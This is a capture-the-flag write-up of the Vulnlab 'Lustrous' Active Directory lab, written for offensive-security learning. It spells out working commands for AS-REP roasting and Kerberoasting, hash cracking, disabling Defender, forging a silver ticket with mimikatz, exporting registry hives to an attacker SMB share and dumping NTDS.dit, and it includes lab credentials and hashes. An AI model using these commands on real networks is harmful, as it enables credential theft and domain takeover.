CTF-Writeups/Vulnlab/Lustrous.md
2023-08-21 22:53:00 +03:00

10 KiB

Vulnlab - Lustrous

NMAP

LusDC.lustrous.vl

PORT      STATE SERVICE      VERSION
21/tcp    open  ftp          Microsoft ftpd
53/tcp    open  domain       Simple DNS Plus
80/tcp    open  http         Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0  
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2023-08-18 17:17:52Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: lustrous.vl0., Site: Default-First-Site-Name)
443/tcp   open  ssl/http     Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_ssl-date: TLS randomness does not represent time
| tls-alpn:            
|_  http/1.1                         
|_http-server-header: Microsoft-HTTPAPI/2.0
| ssl-cert: Subject: commonName=LusDC.lustrous.vl
| Subject Alternative Name: DNS:LusDC.lustrous.vl
| Issuer: commonName=LusDC.lustrous.vl
445/tcp   open  tcpwrapped
3269/tcp  open  tcpwrapped
3389/tcp  open  tcpwrapped
| ssl-cert: Subject: commonName=LusDC.lustrous.vl
49669/tcp open  tcpwrapped
58017/tcp open  msrpc        Microsoft Windows RPC
58052/tcp open  unknown

LusMS.lustrous.vl

PORT     STATE SERVICE       REASON          VERSION
135/tcp  open  tcpwrapped    syn-ack ttl 127
139/tcp  open  tcpwrapped    syn-ack ttl 127
445/tcp  open  microsoft-ds? syn-ack ttl 127
3389/tcp open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
|_ssl-date: 2023-08-18T16:57:21+00:00; -4s from scanner time.
| ssl-cert: Subject: commonName=LusMS.lustrous.vl
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
49668/tcp open  unknown       syn-ack ttl 127

LusDC has webserver running, on accessing that it gives us access denied so it maybe accessible from the machine itself or from LusMS

Checking for smb shares on LusDC and LusMS

We didn't get any shares with null authentication, checking the ftp service with anonymous user on LusDC, there's a transfer folder there

We get few user's directories

Out of these directories, there's only ben.cox who has users.cvs file, this file only had domain groups

Initital Foothold (ben.cox)

We have usernames so the only thing we could try here is to perform AS-REP roasting which doesn't require any password as do not require preauthentication check is marked on these accounts, so with GetNPUsers.py we can verify if these users have that check

GetNPUsers.py lustrous.vl/ -usersfile users.txt  -dc-ip LusDC.lustrous.vl -request
Having the hash, we can crack it with `hashcat`
hashcat -a 0 -m 18200 ./hash.txt /usr/share/wordlists/rockyou.txt  --force
Having the valid credentials we can check if there's any share `ben` can read but it doesn't show any interesting shares

On to enumerating the domain with python-bloodhound

python3 /opt/BloodHound.py-Kerberos/bloodhound.py -d 'lustrous.vl' -u 'ben.cox' -p 'Trinity1' -c all -ns 10.10.152.149
From ben's groups, he's in `Remote Access` so maybe we can log into LusMS

Running the shortest path to high value targets we have tony.ward who is part of backup admins so we'll have to reach to that user somehow and maybe abuse that group.

To verify if we can have a shell on LusMS, running cme again on winrm

evil-winrm -i 10.10.152.150 -u 'ben.cox' -p 'Trinity1'

From ben's desktop folder we'll get admin.xml having the secure string password of local administrator

Following this article to retrieve the plaintext password https://systemweakness.com/powershell-credentials-for-pentesters-securestring-pscredentials-787263abf9d8, we'll create two variables, `user` having the username and `pass` having the secure string password which will be piped to `ConvertTo-SecureString` , create `PSCredential` of the username and password and then with `GetNetworkCredential` we'll print out the credentials
$user = "Administrator"
$pass = "01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d4ecf9dfb12aed4eab72b909047c4e560000000002000000000003660000c000000010000000d5ad4244981a04676e2b522e24a5e8000000000004800000a00000001000000072cd97a471d9d6379c6d8563145c9c0e48000000f31b15696fdcdfdedc9d50e1f4b83dda7f36bde64dcfb8dfe8e6d4ec059cfc3cc87fa7d7898bf28cb02352514f31ed2fb44ec44b40ef196b143cfb28ac7eff5f85c131798cb77da914000000e43aa04d2437278439a9f7f4b812ad3776345367" | ConvertTo-SecureString
cred = New-Object System.Management.Automation.PSCredential($user, $pass)
$cred.GetNetworkCredential() | Format-List

With this password we can login as administrator

Dumping credentials didn't gave us any new set of credential

Forging silver ticket to impersonate as tony.ward

Going back to bloodhound, we see two kerberoastable users, out of which svc_web might be useful for us as there's no mssql service running

With GetUsersSPNs.py we can request the hash

GetUserSPNs.py Lustrous.vl/ben.cox:Trinity1 -dc-ip LusDC.lustrous.vl -request-user svc_web
hashcat -a 0 -m 13100 svc_web.txt /usr/share/wordlists/rockyou.txt  --force
We saw a web page on LusDC, which we were not able to access, it maybe using kerberos authentication so with `getTGT.py` we can request the kerberos ticket of ben to see if we can access that page
 getTGT.py lustrous.vl/ben.cox:Trinity1 -dc-ip 10.10.222.197

Edit /etc/krb5.conf file as well

Now importing the ticket in KRB5CCNAME variable

With curl we can access the page using kerberos authentication and from the output, it shows that it's some kind of notetaking application where there's a page /Internal

Here it shows the password of ben and a note about activating kerberos authentication, we have the password of svc_web meaning that we can create a silver ticket to impersonate any user on the application and since we saw tony.ward is part of backup operators group we may need to move forward with that user, so impersonating as tony. Through rpcclient we can get sid of tony

With tickter.py we can forge a silver ticket

But the site was not accessible with this ticket, I am not sure why it wasn't working so I moved on to windows machine to forge the ticket and try from there, to do that since defender is enabled we need to disable it in order to run mimikatz and we need to be SYSTEM user on LusMS to do this

Set-MpPreference -DisableRealtimeMonitoring $true
kerberos::golden /domain:lustrous.vl /sid:S-1-5-21-2355092754-1584501958-1513963426 /rc4:e67af8b3d78df5a02eb0d57b6cb60717 /user:tony.ward /target:LusDC.lustrous.vl /id:1114 /service:http/lusdc.lustrous.vl /ptt
Running `klist` we'll see that the ticket is loaded into the memory With `Invoke-WebRequest` we can can access the `Internal` endpoint showing the password for tony.ward
Invoke-WebRequest -Uri http://lusdc.lustrous.vl/Internal -UseDefaultCredentials -UseBasicParsing | Select-Object -Expand Content

From Backup Operators To Domain Admin

Since tony.ward is a member of backup operators, which has SeBackup and SeRestore privilege which can allow the group members to access any file so here we can take a backup of ntds.dit but we can't get a remote shell with this user

However we can use the PoC https://raw.githubusercontent.com/Wh04m1001/Random/main/BackupOperators.cpp which is made by Filip Dragovic, just replace credentials and add the DC host

But to my surprise this didn't worked

Using reg.py from impacket which is for querying remote registry, we can dump SAM, SYSTEM and SECURITY files from registry hive

reg.py lustrous.vl/tony.ward:U_cPVQqEI50i1X@10.10.233.213 save -keyName 'HKLM\SAM' -o '\\10.8.0.136\UWU'
reg.py lustrous.vl/tony.ward:U_cPVQqEI50i1X@10.10.233.213 save -keyName 'HKLM\SYSTEM' -o '\\10.8.0.136\UWU'
reg.py lustrous.vl/tony.ward:U_cPVQqEI50i1X@10.10.233.213 save -keyName 'HKLM\SECURITY' -o '\\10.8.0.136\UWU'

With secretsdump.py , we can parse SAM file locally

secretsdump.py -sam ./SAM.save -system ./SYSTEM.save -security ./SECURITY.save local
The administrator hash we get is for DSRM as DC uses NTDS.dit file for the password hashes so we cannot use this hash as DSRM needs to be enabled, so using the machine account (LusDC) with the hash `a34bee37b205abb8908277c4751d79ea` we can dump the `NTDS.dit` file
secretsdump.py 'LusDC$'@10.10.233.213 -hashes ':a34bee37b205abb8908277c4751d79ea'

References